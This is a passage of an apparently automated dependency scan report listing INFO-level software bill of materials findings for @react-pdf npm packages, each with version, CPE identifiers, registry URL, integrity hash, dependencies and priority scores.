cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/font@2.5.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz + integrity: sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/types': ^2.6.0 + cross-fetch: ^3.1.5 + fontkit: ^2.0.2 + is-url: ^1.2.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 325345669fb318b9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/font 4.0.8' + title: '@react-pdf/font 4.0.8' + description: 'Package discovered: @react-pdf/font 4.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 19aa56c736ba6f4e + name: '@react-pdf/font' + version: 4.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/font@4.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz + integrity: sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA== + dependencies: + '@react-pdf/pdfkit': ^5.1.1 + '@react-pdf/types': ^2.11.1 + fontkit: ^2.0.2 + is-url: ^1.2.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a9ddc08bb5c72c17 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/image 2.3.6' + title: '@react-pdf/image 2.3.6' + description: 'Package discovered: @react-pdf/image 2.3.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e700f7d1572a4159 + name: '@react-pdf/image' + version: 2.3.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/image@2.3.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz + integrity: sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/png-js': ^2.3.1 + cross-fetch: ^3.1.5 + jay-peg: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 751c0bb9092b6d5a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/layout 3.13.0' + title: '@react-pdf/layout 3.13.0' + description: 'Package discovered: @react-pdf/layout 3.13.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bfc90f0951098a84 + name: '@react-pdf/layout' + version: 3.13.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/layout@3.13.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz + integrity: sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/fns': 2.2.1 + '@react-pdf/image': ^2.3.6 + '@react-pdf/pdfkit': ^3.2.0 + '@react-pdf/primitives': ^3.1.1 + '@react-pdf/stylesheet': ^4.3.0 + '@react-pdf/textkit': ^4.4.1 + '@react-pdf/types': ^2.6.0 + cross-fetch: ^3.1.5 + emoji-regex: ^10.3.0 + queue: ^6.0.1 + yoga-layout: ^2.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 18357a3fbdd2a393 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/pdfkit 3.2.0' + title: '@react-pdf/pdfkit 3.2.0' + description: 'Package discovered: @react-pdf/pdfkit 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3f225c34b86f8909 + name: '@react-pdf/pdfkit' + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/pdfkit@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz + integrity: sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/png-js': ^2.3.1 + browserify-zlib: ^0.2.0 + crypto-js: ^4.2.0 + fontkit: ^2.0.2 + jay-peg: ^1.0.2 + vite-compatible-readable-stream: ^3.6.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a9e659420a7b937a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/pdfkit 5.1.1' + title: '@react-pdf/pdfkit 5.1.1' + description: 'Package discovered: @react-pdf/pdfkit 5.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 24d45580f4c0f7bb + name: '@react-pdf/pdfkit' + version: 5.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/pdfkit@5.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz + integrity: sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg== + dependencies: + '@babel/runtime': ^7.20.13 + '@noble/ciphers': ^1.0.0 + '@noble/hashes': ^1.6.0 + browserify-zlib: ^0.2.0 + fontkit: ^2.0.2 + jay-peg: ^1.1.1 + js-md5: ^0.8.3 + linebreak: ^1.1.0 + png-js: ^2.0.0 + vite-compatible-readable-stream: ^3.6.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aadf20f14ed3a63a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/png-js 2.3.1' + title: '@react-pdf/png-js 2.3.1' + description: 'Package discovered: @react-pdf/png-js 2.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ecd22ec88d1d110f + name: '@react-pdf/png-js' + version: 2.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/png-js@2.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz + integrity: sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg== + dependencies: + browserify-zlib: ^0.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4f8cb527e021a217 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/primitives 3.1.1' + title: '@react-pdf/primitives 3.1.1' + description: 'Package discovered: @react-pdf/primitives 3.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 18694a13e91dacfb + name: '@react-pdf/primitives' + version: 3.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/primitives@3.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz + integrity: sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2743499890ec5e22 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/primitives 4.3.0' + title: '@react-pdf/primitives 4.3.0' + description: 'Package discovered: @react-pdf/primitives 4.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: edf229ed71e6ba52 + name: '@react-pdf/primitives' + version: 4.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/primitives@4.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz + integrity: sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ea34747c8a1e8321 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/render 3.5.0' + title: '@react-pdf/render 3.5.0' + description: 'Package discovered: @react-pdf/render 3.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3e1fba314601b9a8 + name: '@react-pdf/render' + version: 3.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/render@3.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz + integrity: sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/fns': 2.2.1 + '@react-pdf/primitives': ^3.1.1 + '@react-pdf/textkit': ^4.4.1 + '@react-pdf/types': ^2.6.0 + abs-svg-path: ^0.1.1 + color-string: ^1.9.1 + normalize-svg-path: ^1.1.0 + parse-svg-path: ^0.1.2 + svg-arc-to-cubic-bezier: ^3.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9ecea192844aa50b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/renderer 3.4.5' + title: '@react-pdf/renderer 3.4.5' + description: 'Package discovered: @react-pdf/renderer 3.4.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d2a573a75d297737 + name: '@react-pdf/renderer' + version: 3.4.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/renderer@3.4.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz + integrity: sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/font': ^2.5.2 + '@react-pdf/layout': ^3.13.0 + '@react-pdf/pdfkit': ^3.2.0 + '@react-pdf/primitives': ^3.1.1 + '@react-pdf/render': ^3.5.0 + '@react-pdf/types': ^2.6.0 + events: ^3.3.0 + object-assign: ^4.1.1 + prop-types: ^15.6.2 + queue: ^6.0.1 + scheduler: ^0.17.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 25636a50f9953390 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/stylesheet 4.3.0' + title: '@react-pdf/stylesheet 4.3.0' + description: 'Package discovered: @react-pdf/stylesheet 4.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 618f90b9a2f3d884 + name: '@react-pdf/stylesheet' + version: 4.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/stylesheet@4.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz + integrity: sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/fns': 2.2.1 + '@react-pdf/types': ^2.6.0 + color-string: ^1.9.1 + hsl-to-hex: ^1.0.0 + media-engine: ^1.0.3 + postcss-value-parser: ^4.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + 